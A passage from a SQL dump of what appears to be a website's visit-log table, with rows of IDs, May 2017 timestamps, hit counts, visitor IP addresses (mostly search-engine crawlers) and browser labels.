0',''),(109418,1494589475,1,1,0,0,'8.29.198.26','other'),(109419,1494589712,1,1,0,0,'217.182.132.90','other'),(109420,1494590217,1,1,0,0,'91.196.178.69','firefox'),(109421,1494590371,1,1,0,0,'89.21.72.182','firefox'),(109422,1494590670,1,1,0,0,'51.255.65.74','other'),(109423,1494591233,1,1,0,0,'217.182.132.6','other'),(109424,1494591342,1,0,1,0,'66.249.66.87',''),(109425,1494591414,1,1,0,0,'164.132.161.80','other'),(109426,1494591420,1,1,0,0,'51.255.65.81','other'),(109427,1494591521,1,1,0,0,'164.132.161.10','other'),(109428,1494591561,1,1,0,0,'51.255.65.60','other'),(109429,1494591897,1,1,0,0,'51.255.65.61','other'),(109430,1494592316,1,0,1,0,'66.249.66.81',''),(109431,1494592539,1,1,0,0,'217.182.132.77','other'),(109432,1494592637,1,1,0,0,'217.182.132.63','other'),(109433,1494592653,10,10,0,0,'69.58.178.58','other'),(109434,1494593423,1,0,1,0,'68.180.228.186',''),(109435,1494594106,1,1,0,0,'217.182.132.150','other'),(109436,1494594614,1,1,0,0,'217.182.132.24','other'),(109437,1494595319,1,1,0,0,'164.132.161.67','other'),(109438,1494595377,1,1,0,0,'51.255.65.27','other'),(109439,1494595401,1,1,0,0,'164.132.161.68','other'),(109440,1494595619,1,1,0,0,'217.69.133.28','other'),(109441,1494595802,1,1,0,0,'51.255.65.58','other'),(109442,1494595883,1,0,1,0,'66.249.66.84',''),(109443,1494596481,1,1,0,0,'217.182.132.74','other'),(109444,1494597035,1,1,0,0,'164.132.161.64','other'),(109445,1494597073,2,0,2,0,'68.180.228.186',''),(109446,1494597092,1,1,0,0,'180.76.15.139','other'),(109447,1494597395,1,1,0,0,'91.196.178.165','chrome'),(109448,1494597470,1,1,0,0,'164.132.162.160','other'),(109449,1494597488,1,1,0,0,'91.196.178.69','firefox'),(109450,1494597981,1,0,1,0,'68.180.231.24',''),(109451,1494598370,1,1,0,0,'51.255.65.55','other'),(109452,1494598546,1,1,0,0,'164.132.161.5','other'),(109453,1494598595,1,1,0,0,'51.255.65.70','other'),(109454,1494598923,1,1,0,0,'128.68.52.106','msie'),(109455,1494599391,1,1,0,0,'51.255.65.32','other'),(109456,1494599760,1,1,0,0,'95.132.52.209','firefox'),(109457,1494599781,1,0,1,0,'66.249.66.87',''),(109458,1494599948,1,1,0,0,'217.182.132.190','other'),(109459,1494600002,1,1,0,0,'164.132.162.158','other'),(109460,1494600318,1,1,0,0,'8.29.198.25','other'),(109461,1494600444,2,0,2,0,'66.249.66.177',''),(109462,1494601056,1,1,0,0,'217.182.132.15','other'),(109463,1494601154,1,1,0,0,'164.132.161.72','other'),(109464,1494601450,1,1,0,0,'164.132.161.56','other'),(109465,1494601466,1,0,1,0,'66.249.66.183',''),(109466,1494602278,1,1,0,0,'164.132.161.51','other'),(109467,1494603315,1,0,1,0,'66.249.66.81',''),(109468,1494603786,1,1,0,0,'164.132.162.153','other'),(109469,1494604115,1,1,0,0,'51.255.71.122','other'),(109470,1494604220,1,0,1,0,'66.249.66.180',''),(109471,1494604533,1,1,0,0,'66.102.9.27','chrome'),(109472,1494604697,1,1,0,0,'164.132.161.18','other'),(109473,1494604734,1,1,0,0,'217.182.132.147','other'),(109474,1494605512,1,1,0,0,'51.255.65.6','other'),(109475,1494605678,1,1,0,0,'164.132.161.90','other'),(109476,1494605989,1,1,0,0,'217.182.132.18','other'),(109477,1494606155,1,1,0,0,'91.196.178.36','firefox'),(109478,1494606207,1,1,0,0,'164.132.161.91','other'),(109479,1494606539,1,1,0,0,'164.132.161.67','other'),(109480,1494606565,1,1,0,0,'157.55.39.41','other'),(109481,1494606678,1,1,0,0,'51.255.65.95','other'),(109482,1494607082,1,1,0,0,'137.74.207.108','other'),(109483,1494607128,2,0,2,0,'66.249.66.177',''),(109484,1494607272,1,1,0,0,'164.132.161.60','other'),(109485,1494607372,1,1,0,0,'51.255.65.8','other'),(109486,1494607592,1,1,0,0,'180.76.15.140','other'),(109487,1494607604,1,1,0,0,'51.255.65.69','other'),(109488,1494607736,1,1,0,0,'51.255.65.35','other'),(109489,1494607829,1,1,0,0,'51.255.65.53','other'),(109490,1494607860,2,2,0,0,'217.182.132.173','other'),(109491,1494607868,1,1,0,0,'66.249.93.204','chrome'),(109492,1494608514,1,1,0,0,'51.255.65.74','other'),(109493,1494608590,1,1,0,0,'217.182.132.240','other'),(109494,1494608897,1,1,0,0,'217.182.132.37','other'),(109495,1494608949,1,1,0,0,'51.255.65.44','other'),(109496,1494609490,1,1,0,0,'164.132.161.50','other'),(109497,1494609711,2,0,2,0,'66.249.66.177',''),(109498,1494609763,2,0,2,0,'66.249.66.87',''),(109499,1494610104,1,1,0,0,'217.182.132.33','other'),(109500,1494610343,1,1,0,0,'51.255.65.12','other'),(109501,1494610493,1,1,0,0,'37.115.95.185','chrome'),(109502,1494610578,1,1,0,0,'51.255.65.73','other'),(109503,1494610797,1,1,0,0,'157.55.39.90','other'),(109504,1494610942,1,0,1,0,'66.249.66.81',''),(109505,1494610950,1,1,0,0,'51.255.65.65','other'),(109506,1494611120,2,2,0,0,'207.46.13.102','other'),(109507,1494611125,1,1,0,0,'51.255.71.128','other'),(109508,1494611149,1,1,0,0,'8.29.198.27','other'),(109509,1494611248,1,1,0,0,'51.255.71.98','other'),(109510,1494611324,1,1,0,0,'185.80.220.37','chrome'),(109511,1494611747,2,2,0,0,'51.255.65.58','other'),(109512,1494611910,1,1,0,0,'164.132.161.38','other'),(109513,1494612353,1,1,0,0,'164.132.161.90','other'),(109514,1494612512,1,0,1,0,'66.249.66.177',''),(109515,1494612648,1,1,0,0,'51.255.65.9','other'),(109516,1494612697,1,1,0,0,'141.8.132.43','other'),(109517,1494612800,1,0,1,0,'66.249.66.183',''),(109518,1494613112,1,1,0,0,'164.132.161.33','other'),(109519,1494613119,1,1,0,0,'185.80.220.37','chrome'),(109520,1494613134,1,1,0,0,'217.182.132.179','other'),(109521,1494613420,1,1,0,0,'51.255.65.80','other'),(109522,1494613569,1,1,0,0,'164.132.161.34','other'),(109523,1494614028,1,1,0,0,'51.255.65.69','other'),(109524,1494614155,1,1,0,0,'51.255.71.125','other'),(109525,1494614196,1,0,1,0,'68.180.231.24',''),(109526,1494614533,1,1,0,0,'51.255.65.11','other'),(109527,1494614666,1,1,0,0,'164.132.161.84','other'),(109528,1494614747,1,0,1,0,'66.249.66.81',''),(109529,1494614773,1,1,0,0,'217.182.132.78','other'),(109530,1494614774,1,1,0,0,'217.182.132.55','other'),(109531,1494614807,1,1,0,0,'51.255.71.122','other'),(109532,1494614919,1,1,0,0,'185.80.220.37','chrome'),(109533,1494615176,1,1,0,0,'164.132.161.5','other'),(109534,1494615753,1,1,0,0,'51.255.65.2','other'),(109535,1494616017,1,0,1,0,'66.249.66.87',''),(109536,1494616161,1,1,0,0,'217.182.132.75','other'),(109537,1494616221,1,1,0,0,'217.182.132.59','other'),(109538,1494616719,1,1,0,0,'185.80.220.37','chrome'),(109539,1494616746,1,0,1,0,'66.249.66.183',''),(109540,1494616838,1,1,0,0,'51.255.71.113','other'),(109541,1494617527,1,1,0,0,'107.23.231.10','other'),(109542,1494617673,1,1,0,0,'217.182.132.91','other'),(109543,1494617872,1,0,1,0,'68.180.228.186',''),(109544,1494618207,1,1,0,0,'51.255.71.100','other'),(109545,1494618264,1,1,0,0,'164.132.161.94','other'),(109546,1494618329,1,1,0,0,'164.132.161.60','other'),(109547,1494618519,1,1,0,0,'185.80.220.37','chrome'),(109548,1494618836,1,1,0,0,'164.132.162.188','other'),(109549,1494618952,1,1,0,0,'144.76.12.66','other'),(109550,1494619172,1,1,0,0,'137.74.207.109','other'),(109551,1494619461,1,1,0,0,'217.182.132.180','other'),(109552,1494619481,1,1,0,0,'217.182.132.14','other'),(109553,1494619571,1,1,0,0,'176.105.211.180','chrome'),(109554,1494619721,1,1,0,0,'137.74.207.116','other'),(109555,1494619995,1,1,0,0,'51.255.71.127','other'),(109556,1494620036,1,1,0,0,'217.182.132.28','other'),(109557,1494620320,1,1,0,0,'185.80.220.37','chrome'),(109558,1494620445,1,1,0,0,'216.244.66.237','other'),(109559,1494620473,1,0,1,0,'66.249.66.84',''),(109560,1494621096,1,1,0,0,'51.255.71.100','other'),(109561,1494621574,1,0,1,0,'66.249.66.180',''),(109562,1494621886,1,0,1,0,'66.249.66.183',''),(109563,1494621988,1,1,0,0,'8.29.198.26','other'),(109564,1494622222,1,1,0,0,'164.132.161.3','other'),(109565,1494622707,1,1,0,0,'51.255.71.110','other'),(109566,1494623199,1,1,0,0,'217.182.132.156','other'),(109567,1494625390,1,1,0,0,'164.132.161.67','other'),(109568,1494625866,1,1,0,0,'217.182.132.70','other'),(109569,1494626611,1,1,0,0,'217.182.132.51','other'),(109570,1494627067,1,1,0,0,'137.74.207.101','other'),(109571,1494627281,1,1,0,0,'164.132.161.44','other'),(109572,1494627444,1,1,0,0,'164.132.161.73','other'),(109573,1494627484,1,0,1,0,'68.180.228.186',''),(109574,1494627812,1,1,0,0,'217.182.132.82','other'),(109575,1494627925,1,1,0,0,'164.132.161.46','other'),(109576,1494628643,1,1,0,0,'51.255.71.110','other'),(109577,1494628857,1,1,0,0,'51.255.65.52','other'),(109578,1494629090,1,1,0,0,'217.182.132.7','other'),(109579,1494629208,1,1,0,0,'51.255.65.66','other'),(109580,1494629792,1,1,0,0,'51.255.65.90','other'),(109581,1494630108,1,1,0,0,'51.255.65.28','other'),(109582,1494630211,1,1,0,0,'217.182.132.172','other'),(109583,1494630460,1,1,0,0,'51.255.65.53','other'),(109584,1494630511,1,1,0,0,'51.255.65.8','other'),(109585,1494630534,1,1,0,0,'51.255.65.58','other'),(109586,1494630612,1,0,1,0,'66.249.66.84',''),(109587,1494630840,1,1,0,0,'137.74.207.159','other'),(109588,1494630930,1,1,0,0,'51.255.65.45','other'),(109589,1494630978,1,1,0,0,'217.182.132.153','other'),(109590,1494631206,1,1,0,0,'217.182.132.17','other'),(109591,1494631343,1,1,0,0,'180.76.15.155','other'),(109592,1494631875,1,1,0,0,'178.140.13.197','msie'),(109593,1494631876,1,1,0,0,'51.255.65.224','other'),(109594,1494632291,1,0,1,0,'66.249.66.81',''),(109595,1494632757,1,1,0,0,'51.255.65.87','other'),(109596,1494632822,1,1,0,0,'8.29.198.27','other'),(109597,1494633169,1,1,0,0,'137.74.207.120','other'),(109598,1494633409,1,1,0,0,'164.132.161.63','other'),(109599,1494633539,1,1,0,0,'164.132.161.80','other'),(109600,1494635132,1,1,0,0,'51.255.71.115','other'),(109601,1494635602,1,1,0,0,'191.96.143.21','other'),(109602,1494635926,1,1,0,0,'51.255.65.35','other'),(109603,1494636048,1,1,0,0,'51.255.65.6','other'),(109604,1494636212,1,1,0,0,'137.74.201.108','other'),(109605,1494637301,1,0,1,0,'66.249.66.183',''),(109606,1494637441,1,1,0,0,'164.132.161.74','other'),(109607,1494637477,1,1,0,0,'51.255.71.112','other'),(109608,1494637490,1,1,0,0,'180.76.15.138','other'),(109609,1494637711,1,1,0,0,'51.255.65.61','other'),(109610,1494638288,1,1,0,0,'217.182.132.174','other'),(109611,1494638664,1,1,0,0,'217.182.132.15','other'),(109612,1494639068,1,1,0,0,'164.132.161.78','other'),(109613,1494639145,1,1,0,0,'164.132.161.30','other'),(109614,1494639303,1,1,0,0,'164.132.161.18','other'),(109615,1494639521,1,0,1,0,'68.180.228.186',''),(109616,1494639687,1,0,1,0,'66.249.66.87',''),(109617,1494640421,1,0,1,0,'40.77.167.34',''),(109618,1494640571,1,1,0,0,'217.182.132.62','other'),(109619,1494642223,1,0,1,0,'66.249.66.177',''),(109620,1494642403,1,0,1,0,'68.180.231.24',''),(109621,1494642578,1,1,0,0,'64.62.210.39','chrome'),(109622,1494643131,1,1,0,0,'157.55.39.90','other'),(109623,1494643655,1,1,0,0,'8.29.198.25','other'),(109624,1494643989,1,0,1,0,'66.249.66.84',''),(109625,1494645116,1,0,1,0,'66.249.66.177',''),(109626,1494646350,1,0,1,0,'157.55.39.41',''),(109627,1494646684,2,0,2,0,'68.180.228.186',''),(109628,1494647178,1,0,1,0,'66.249.66.81',''),(109629,1494648071,1,0,1,0,'68.180.228.186',''),(109630,1494648136,1,1,0,0,'66.249.66.87','chrome'),(109631,1494648434,1,1,0,0,'46.188.107.175','chrome'),(109632,1494650224,1,0,1,0,'66.249.66.81',''),(109633,1494650788,1,1,0,0,'40.77.167.34','other'),(109634,1494651033,1,0,1,0,'66.249.66.183',''),(109635,1494652329,1,1,0,0,'207.46.13.125','other'),(109636,1494652520,1,1,0,0,'91.196.178.72','firefox'),(109637,1494652822,1,1,0,0,'157.55.39.41','other'),(109638,1494654186,1,1,0,0,'82.145.220.78','other'),(109639,1494654496,1,1,0,0,'8.29.198.27','other'),(109640,1494654907,1,1,0,0,'141.8.132.72','other'),(109641,1494654966,1,1,0,0,'91.196.178.163','chrome'),(109642,1494655646,1,1,0,0,'91.196.178.68','chrome'),(109643,1494655681,1,1,0,0,'164.132.161.32','other'),(109644,1494655706,1,1,0,0,'51.255.71.127','other'),(109645,1494655820,1,1,0,0,'51.255.65.55','other'),(109646,1494655881,1,1,0,0,'217.182.132.241','other'),(109647,1494655932,1,1,0,0,'164.132.161.5','other'),(109648,1494655959,1,1,0,0,'51.255.65.59','other'),(109649,1494656166,1,1,0,0,'91.196.178.66','firefox'),(109650,1494656214,1,1,0,0,'51.255.71.133','other'),(109651,1494656407,1,0,1,0,'66.249.66.177',''),(109652,1494656515,1,1,0,0,'217.182.132.185','other'),(109653,1494656550,1,1,0,0,'217.182.132.80','other'),(109654,1494656689,1,0,1,0,'66.249.66.87',''),(109655,1494656823,1,0,1,0,'68.180.231.24',''),(109656,1494657425,1,1,0,0,'164.132.161.35','other'),(109657,1494657614,1,1,0,0,'217.182.132.177','other'),(109658,1494657874,1,1,0,0,'91.196.178.33','chrome'),(109659,1494657890,1,1,0,0,'91.196.178.71','firefox'),(109660,1494657913,1,1,0,0,'217.182.132.171','other'),(109661,1494658225,1,1,0,0,'157.55.39.90','other'),(109662,1494658316,1,1,0,0,'118.193.203.205','other'),(109663,1494658535,2,2,0,0,'108.59.8.80','other'),(109664,1494658822,1,1,0,0,'91.196.178.71','chrome'),(109665,1494658947,1,1,0,0,'51.255.71.125','other'),(109666,1494658994,1,1,0,0,'217.182.132.70','other'),(109667,1494659361,1,1,0,0,'164.132.161.89','other'),(109668,1494659406,1,1,0,0,'91.209.11.236','other'),(109669,1494659532,1,1,0,0,'51.255.65.93','other'),(109670,1494659568,1,1,0,0,'95.84.129.149','msie'),(109671,1494659762,1,1,0,0,'217.182.132.151','other'),(109672,1494659769,1,0,1,0,'66.249.66.84',''),(109673,1494659796,1,1,0,0,'164.132.162.159','other'),(109674,1494659888,1,1,0,0,'217.182.132.61','other'),(109675,1494660282,1,1,0,0,'217.182.132.148','other'),(109676,1494660479,1,1,0,0,'164.132.161.41','other'),(109677,1494660745,2,2,0,0,'164.132.161.66','other'),(109678,1494660812,1,1,0,0,'217.182.132.154','other'),(109679,1494661392,1,1,0,0,'217.182.132.173','other'),(109680,1494661504,1,0,1,0,'66.249.66.177',''),(109681,1494661635,1,1,0,0,'217.182.132.86','other'),(109682,1494661935,1,1,0,0,'164.132.161.81','other'),(109683,1494662107,1,1,0,0,'217.182.132.66','other'),(109684,1494662120,1,1,0,0,'91.196.178.68','chrome'),(109685,1494662212,1,1,0,0,'217.182.132.175','other'),(109686,1494662333,2,0,2,0,'66.249.66.87',''),(109687,1494662419,1,0,1,0,'66.249.66.180',''),(109688,1494662447,2,2,0,0,'94.179.24.92','chrome'),(109689,1494662564,1,0,1,0,'66.249.66.81',''),(109690,1494662605,1,0,1,0,'66.249.66.183',''),(109691,1494662990,1,1,0,0,'51.255.71.118','other'),(109692,1494663517,3,0,3,0,'66.249.66.81',''),(109693,1494663589,1,1,0,0,'91.196.178.68','chrome'),(109694,1494664014,1,1,0,0,'137.74.207.164','other'),(109695,1494664167,1,0,1,0,'68.180.228.186',''),(109696,1494665341,1,1,0,0,'8.29.198.27','other'),(109697,1494665930,1,1,0,0,'51.255.65.56','other'),(109698,1494666291,1,0,1,0,'66.249.66.81',''),(109699,1494666334,1,1,0,0,'91.196.178.38','chrome'),(109700,1494666533,1,1,0,0,'217.69.133.239','other'),(109701,1494666722,1,1,0,0,'164.132.161.87','other'),(109702,1494667224,1,1,0,0,'137.74.203.194','other'),(109703,1494667296,1,1,0,0,'164.132.161.8','other'),(109704,1494667689,1,0,1,0,'66.249.66.177',''),(109705,1494667803,1,0,1,0,'207.46.13.125',''),(109706,1494667838,1,1,0,0,'51.255.65.38','other'),(109707,1494667941,1,1,0,0,'91.196.178.68','chrome'),(109708,1494668002,1,1,0,0,'164.132.161.34','other'),(109709,1494668115,1,1,0,0,'92.113.126.254','chrome'),(109710,1494668310,1,0,1,0,'68.180.228.186',''),(109711,1494668709,1,1,0,0,'217.182.132.90','other'),(109712,1494668876,1,1,0,0,'51.255.71.130','other'),(109713,1494669008,1,1,0,0,'78.111.190.157','firefox'),(109714,1494669215,1,1,0,0,'51.255.65.16','other'),(109715,1494669260,1,1,0,0,'164.132.161.48','other'),(109716,1494669413,1,1,0,0,'51.255.65.50','other'),(109717,1494669727,1,1,0,0,'118.193.203.205','other'),(109718,1494669979,1,0,1,0,'157.55.39.90',''),(109719,1494670195,1,0,1,0,'66.249.66.81',''),(109720,1494670202,1,0,1,0,'66.249.66.87',''),(109721,1494670384,1,1,0,0,'51.255.71.100','other'),(109722,1494670631,1,1,0,0,'164.132.161.16','other'),(109723,1494671255,1,0,1,0,'66.249.66.177',''),(109724,1494671500,1,1,0,0,'51.255.71.130','other'),(109725,1494671586,1,0,1,0,'68.180.228.186',''),(109726,1494672142,1,1,0,0,'164.132.161.47','other'),(109727,1494672272,1,1,0,0,'46.211.127.13','other'),(109728,1494673362,1,1,0,0,'51.255.65.38','other'),(109729,1494673471,1,0,1,0,'66.249.66.183',''),(109730,1494673479,1,1,0,0,'217.182.132.241','other'),(109731,1494673607,1,1,0,0,'51.255.65.91','other'),(109732,1494673760,1,1,0,0,'137.74.201.108','other'),(109733,1494674367,1,1,0,0,'137.74.207.170','other'),(109734,1494674663,1,1,0,0,'180.76.15.157','other'),(109735,1494675346,1,1,0,0,'164.132.161.76','other'),(109736,1494675830,1,1,0,0,'164.132.161.60','other'),(109737,1494676027,1,0,1,0,'66.249.66.84',''),(109738,1494676032,1,0,1,0,'66.249.66.81',''),(109739,1494676172,1,1,0,0,'8.29.198.26','other'),(109740,1494676529,1,0,1,0,'68.180.228.186',''),(109741,1494676797,1,1,0,0,'164.132.161.76','other'),(109742,1494677083,1,1,0,0,'51.255.71.129','other'),(109743,1494677377,1,1,0,0,'178.95.66.52','firefox'),(109744,1494677496,1,1,0,0,'164.132.161.65','other'),(109745,1494677542,1,1,0,0,'46.188.32.37','chrome'),(109746,1494677640,1,0,1,0,'66.249.66.81',''),(109747,1494677697,1,1,0,0,'51.255.65.7','other'),(109748,1494678420,5,5,0,0,'118.89.241.47','other'),(109749,1494678461,1,1,0,0,'51.255.65.65','other'),(109750,1494678883,2,0,2,0,'68.180.228.186',''),(109751,1494678907,1,1,0,0,'217.182.132.241','other'),(109752,1494678966,1,1,0,0,'51.255.65.55','other'),(109753,1494679128,1,1,0,0,'217.182.132.35','other'),(109754,1494679816,1,1,0,0,'51.255.65.23','other'),(109755,1494679879,1,1,0,0,'217.182.132.56','other'),(109756,1494680089,1,1,0,0,'37.55.226.10','chrome'),(109757,1494680228,1,1,0,0,'164.132.161.94','other'),(109758,1494680343,1,1,0,0,'164.132.162.164','other'),(109759,1494680572,1,1,0,0,'51.255.65.70','other'),(109760,1494680739,1,0,1,0,'66.249.66.180',''),(109761,1494680784,1,1,0,0,'51.255.71.130','other'),(109762,1494680809,1,1,0,0,'217.182.132.69','other'),(109763,1494681759,1,1,0,0,'217.182.132.97','other'),(109764,1494682095,1,1,0,0,'164.132.162.157','other'),(109765,1494682384,2,0,2,0,'66.249.66.81',''),(109766,1494682896,1,0,1,0,'66.249.66.87',''),(109767,1494682920,1,0,1,0,'66.249.66.84',''),(109768,1494683015,1,1,0,0,'217.182.132.34','other'),(109769,1494683097,1,1,0,0,'164.132.161.5','other'),(109770,1494683142,1,1,0,0,'217.182.132.83','other'),(109771,1494683309,1,1,0,0,'51.255.65.60','other'),(109772,1494683710,1,1,0,0,'51.255.65.96','other'),(109773,1494684164,1,1,0,0,'164.132.161.54','other'),(109774,1494684303,1,1,0,0,'51.255.65.34','other'),(109775,1494684348,1,0,1,0,'66.249.66.183',''),(109776,1494684646,1,1,0,0,'51.255.65.18','other'),(109777,1494684720,1,1,0,0,'217.182.132.241','other'),(109778,1494684776,1,1,0,0,'193.194.127.217','firefox'),(109779,1494684904,1,1,0,0,'217.182.132.25','other'),(109780,1494685818,1,1,0,0,'51.255.65.52','other'),(109781,1494685829,1,1,0,0,'164.132.161.30','other'),(109782,1494685877,1,1,0,0,'51.255.65.25','other'),(109783,1494686010,1,1,0,0,'51.255.65.22','other'),(109784,1494686174,2,0,2,0,'68.180.228.186',''),(109785,1494686266,1,1,0,0,'217.182.132.18','other'),(109786,1494686662,1,1,0,0,'51.255.65.9','other'),(109787,1494687009,1,1,0,0,'8.29.198.27','other'),(109788,1494687060,1,1,0,0,'164.132.161.4','other'),(109789,1494687228,1,0,1,0,'66.249.66.84',''),(109790,1494687358,1,1,0,0,'164.132.161.52','other'),(109791,1494687588,1,1,0,0,'217.182.132.7','other'),(109792,1494688222,1,1,0,0,'51.255.65.30','other'),(109793,1494688405,1,1,0,0,'164.132.161.6','other'),(109794,1494688631,1,1,0,0,'66.249.66.177','chrome'),(109795,1494688817,1,1,0,0,'51.255.65.65','other'),(109796,1494688846,1,1,0,0,'164.132.161.4','other'),(109797,1494688891,1,0,1,0,'66.249.66.81',''),(109798,1494689112,1,1,0,0,'37.73.214.84','other'),(109799,1494689410,1,1,0,0,'217.182.132.58','other'),(109800,1494689928,1,1,0,0,'51.255.71.117','other'),(109801,1494689983,1,1,0,0,'46.200.23.221','chrome'),(109802,1494690417,1,1,0,0,'217.182.132.63','other'),(109803,1494690481,1,1,0,0,'51.255.65.8','other'),(109804,1494690875,1,1,0,0,'51.255.65.93','other'),(109805,1494690997,1,1,0,0,'217.182.132.157','other'),(109806,1494691030,1,1,0,0,'217.182.132.240','other'),(109807,1494691188,1,1,0,0,'51.255.65.94','other'),(109808,1494691579,1,0,1,0,'66.249.66.84',''),(109809,1494691749,2,2,0,0,'137.74.207.110','other'),(109810,1494692011,1,1,0,0,'93.74.212.147','firefox'),(109811,1494692063,1,1,0,0,'137.74.201.108','other'),(109812,1494692226,1,1,0,0,'164.132.161.86','other'),(109813,1494692231,1,1,0,0,'51.255.65.20','other'),(109814,1494692378,1,1,0,0,'51.255.65.32','other'),(109815,1494692537,1,1,0,0,'164.132.161.80','other'),(109816,1494692873,1,1,0,0,'217.182.132.56','other'),(109817,1494693092,1,0,1,0,'66.249.66.183',''),(109818,1494693137,1,1,0,0,'51.255.65.27','other'),(109819,1494693248,1,0,1,0,'66.249.66.180',''),(109820,1494693394,1,1,0,0,'91.196.178.103','chrome'),(109821,1494693697,1,1,0,0,'157.55.39.41','other'),(109822,1494693848,1,0,1,0,'66.249.66.81',''),(109823,1494694144,1,1,0,0,'217.182.132.16','other'),(109824,1494694200,1,1,0,0,'46.211.155.236','msie'),(109825,1494694203,1,1,0,0,'66.102.9.38','chrome'),(109826,1494694292,1,0,1,0,'66.249.66.180',''),(109827,1494694362,1,1,0,0,'66.102.9.40','chrome'),(109828,1494694389,1,0,1,0,'66.249.66.87',''),(109829,1494694432,1,0,1,0,'66.249.66.84',''),(109830,1494695594,1,1,0,0,'46.211.157.5','msie'),(109831,1494695597,1,1,0,0,'66.102.9.38','chrome'),(109832,1494695652,1,0,1,0,'66.249.66.81',''),(109833,1494695974,1,1,0,0,'217.182.132.84','other'),(109834,1494696014,1,0,1,0,'66.249.66.87',''),(109835,1494696441,1,1,0,0,'217.182.132.191','other'),(109836,1494696448,1,1,0,0,'51.255.65.25','other'),(109837,1494696490,1,1,0,0,'51.255.65.56','other'),(109838,1494696907,1,0,1,0,'66.249.66.81',''),(109839,1494697206,1,0,1,0,'68.180.228.186',''),(109840,1494697419,1,1,0,0,'163.172.108.151','chrome'),(109842,1494697819,1,1,0,0,'164.132.161.79','other'),(109843,1494697845,1,1,0,0,'8.29.198.27','other'),(109844,1494698202,1,1,0,0,'51.255.65.49','other'),(109845,1494698338,1,1,0,0,'193.110.18.35','chrome'),(109846,1494698398,1,1,0,0,'164.132.161.80','other'),(109847,1494698679,1,1,0,0,'141.8.142.164','other'),(109848,1494698726,1,1,0,0,'217.182.132.19','other'),(109849,1494698770,1,1,0,0,'91.196.178.100','chrome'),(109850,1494698924,1,1,0,0,'217.182.132.93','other'),(109851,1494699148,1,1,0,0,'51.255.65.47','other'),(109852,1494699287,1,0,1,0,'68.180.228.186',''),(109853,1494699870,1,1,0,0,'51.255.71.119','other'),(109854,1494700062,1,1,0,0,'217.182.132.74','other'),(109855,1494700260,1,1,0,0,'51.255.65.58','other'),(109856,1494700284,1,0,1,0,'68.180.231.24',''),(109857,1494700397,1,1,0,0,'137.74.207.116','other'),(109858,1494700408,1,1,0,0,'164.132.162.156','other'),(109859,1494700815,1,1,0,0,'51.255.65.72','other'),(109860,1494700824,1,1,0,0,'164.132.161.66','other'),(109861,1494702022,1,1,0,0,'217.182.132.33','other'),(109862,1494702080,1,1,0,0,'51.255.65.18','other'),(109863,1494702231,1,1,0,0,'217.182.132.192','other'),(109864,1494702611,1,1,0,0,'51.255.65.90','other'),(109865,1494702802,1,1,0,0,'51.255.71.114','other'),(109866,1494702964,1,1,0,0,'66.249.66.81','chrome'),(109867,1494703079,1,0,1,0,'66.249.66.87',''),(109868,1494703093,1,1,0,0,'164.132.161.79','other'),(109869,1494703288,1,1,0,0,'130.180.209.50','firefox'),(109870,1494703361,1,1,0,0,'51.255.71.112','other'),(109871,1494703506,1,0,1,0,'66.249.66.183',''),(109872,1494703597,1,1,0,0,'51.255.65.25','other'),(109873,1494703942,1,1,0,0,'164.132.161.97','other'),(109874,1494703949,1,1,0,0,'164.132.161.82','other'),(109875,1494704203,1,0,1,0,'66.249.66.177',''),(109876,1494704394,1,0,1,0,'66.249.66.84',''),(109877,1494704403,1,1,0,0,'137.74.207.102','other'),(109878,1494704414,1,0,1,0,'68.180.228.186',''),(109879,1494705684,1,1,0,0,'217.182.132.148','other'),(109880,1494705945,2,0,2,0,'66.249.66.180',''),(109881,1494706032,1,0,1,0,'66.249.66.84',''),(109882,1494706161,1,1,0,0,'164.132.161.84','other'),(109883,1494706181,1,1,0,0,'51.255.65.74','other'),(109884,1494706313,1,0,1,0,'66.249.66.177',''),(109885,1494707031,2,0,2,0,'66.249.66.81',''),(109886,1494707241,1,1,0,0,'164.132.161.51','other'),(109887,1494707342,2,0,2,0,'66.249.66.183',''),(109888,1494707545,1,1,0,0,'217.182.132.55','other'),(109889,1494707553,1,0,1,0,'66.249.66.177',''),(109890,1494707781,1,1,0,0,'217.182.132.27','other'),(109891,1494708106,1,1,0,0,'137.74.201.108','other'),(109892,1494708677,1,1,0,0,'8.29.198.26','other'),(109893,1494708763,10,10,0,0,'46.229.168.67','other'),(109894,1494708764,2,2,0,0,'46.229.168.75','other'),(109895,1494708782,5,5,0,0,'46.229.168.72','other'),(109896,1494708795,7,7,0,0,'46.229.168.65','other'),(109897,1494708811,4,4,0,0,'46.229.168.71','other'),(109898,1494708852,1,1,0,0,'137.74.207.116','other'),(109899,1494708880,6,6,0,0,'46.229.168.69','other'),(109900,1494708903,1,1,0,0,'46.229.168.73','other'),(109901,1494708961,1,1,0,0,'51.255.71.120','other'),(109902,1494709010,4,4,0,0,'46.229.168.68','other'),(109903,1494709045,2,2,0,0,'46.229.168.66','other'),(109904,1494709411,1,1,0,0,'51.255.65.27','other'),(109905,1494709553,1,0,1,0,'66.249.66.177',''),(109906,1494710447,1,1,0,0,'51.255.65.52','other'),(109907,1494710519,1,1,0,0,'51.255.65.61','other'),(109908,1494710536,1,0,1,0,'66.249.66.177',''),(109909,1494710548,1,0,1,0,'66.249.76.28',''),(109910,1494711256,1,1,0,0,'217.182.132.148','other'),(109911,1494712032,1,1,0,0,'217.182.132.16','other'),(109912,1494712072,1,1,0,0,'137.74.207.120','other'),(109913,1494712872,1,1,0,0,'217.182.132.60','other'),(109914,1494712955,1,1,0,0,'164.132.161.63','other'),(109915,1494713420,1,1,0,0,'216.244.66.237','other'),(109916,1494713718,1,1,0,0,'217.182.132.86','other'),(109917,1494714208,1,1,0,0,'157.55.39.152','other'),(109918,1494714248,1,1,0,0,'89.35.105.113','other'),(109919,1494714287,1,0,1,0,'66.249.66.87',''),(109920,1494714676,1,1,0,0,'51.255.65.93','other'),(109921,1494714787,1,1,0,0,'51.255.71.115','other'),(109922,1494715680,1,1,0,0,'164.132.161.50','other'),(109923,1494715730,1,1,0,0,'164.132.161.61','other'),(109924,1494715969,1,0,1,0,'66.249.66.84',''),(109925,1494716224,1,1,0,0,'164.132.161.67','other'),(109926,1494716885,1,1,0,0,'51.255.65.13','other'),(109927,1494717582,1,1,0,0,'164.132.162.154','other'),(109928,1494718801,1,1,0,0,'217.182.132.31','other'),(109929,1494719348,1,1,0,0,'217.182.132.20','other'),(109930,1494719505,1,1,0,0,'8.29.198.26','other'),(109931,1494719619,1,1,0,0,'164.132.161.88','other'),(109932,1494719923,1,1,0,0,'51.255.65.74','other'),(109933,1494720051,1,1,0,0,'217.182.132.183','other'),(109934,1494720508,1,1,0,0,'217.182.132.241','other'),(109935,1494721033,1,1,0,0,'164.132.161.60','other'),(109936,14